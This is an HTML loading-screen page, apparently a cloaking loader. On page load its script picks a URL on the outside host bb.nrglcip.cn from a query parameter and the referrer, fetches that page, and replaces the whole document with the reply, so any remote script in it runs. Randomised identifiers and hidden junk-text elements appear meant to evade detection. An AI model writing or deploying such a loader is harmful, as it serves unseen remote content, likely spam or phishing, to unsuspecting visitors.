<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .jRdHRpNyJ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .jRdHRpNyJ .szEk34GqW {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .jRdHRpNyJ .content {
            line-height: 50px;
            text-align: center
        }

        .jRdHRpNyJ .img {
            width: 100%
        }

        .jRdHRpNyJ .Mk40c4ri39V {
            text-align: center
        }

        .jRdHRpNyJ .Mk40c4ri39V span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .jRdHRpNyJ .Mk40c4ri39V span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .jRdHRpNyJ .Mk40c4ri39V span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .jRdHRpNyJ .Mk40c4ri39V span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .jRdHRpNyJ .Mk40c4ri39V span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .jRdHRpNyJ .Mk40c4ri39V span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .jRdHRpNyJ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function f4oRSmyUrwg12(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var tuBZqvb = f4oRSmyUrwg12('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ tuBZqvb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ tuBZqvb +".html?a=share";
		}
		
        uQRlPhbf=url+"#"+new Date().getTime();
        uQRlPhbf && function() {
            $.get(uQRlPhbf, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>ijbWcVlpLdyyAByG7SAC66Qk5atquRQWZKB89v31KeqWSGlfP9pz</div>
<div style='display:none'>ijbWcVlpLdyyAByG7SAC66Qk5atquRQWZKB89v31KeqWSGlfP9pz</div>
<a  href='#' style='display:none'>GqQm43Ae9DLViguSdTOWcHjoKVEUQjkLmHFEtYSwWkBzg5imQYTQU7DqmEZfVihsJxD1bGjAGuW9xnQsQ5DSKPw0w8N</a>
<b style='display:none' >gcW8yPVqAEFSC0jUvIjwx4V8tmaKpKMRpQi8UzmHnyPMIenLi7ECjzdJfhhVEs9kUFskyL6ZuWsvj4cRCPQvCE2xoA</b><div class="jRdHRpNyJ">
    <div class="szEk34GqW">
        <div class="Mk40c4ri39V">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >OKBcLOk5L3uVVTIoHq3Bts2OBdwRa2NXFLroWeTGpOxrqfnZ9Hcz</li>
<b style='display:none' >LpYGa2Onu8iKSZzAcD6JlPnPOaSOSfVlrtHlwegNNK4VOXi6bcp6NHdKcWxwIhZCuQscU1NvDSZuXGXdNy9Em</b>
<li style='display:none' >OKBcLOk5L3uVVTIoHq3Bts2OBdwRa2NXFLroWeTGpOxrqfnZ9Hcz</li>
<a  href='#' style='display:none'>ssCDCLBbGv5XkqN7MYqkhKakTsFn7n4XKWJGNwJU</a>
<p  style='display:none'>kz1bVJRIhWeDLfvQiGa9lsEHc9hoL4deFwFshfx4qyZxmxQXqBNwVFcIGWPckbrzdu2</p>
<div style='display:none'>OMSds37X49HyPvLQnivWQMXE5</div>
<a  href='#' style='display:none'>ssCDCLBbGv5XkqN7MYqkhKakTsFn7n4XKWJGNwJU</a></body>
</html>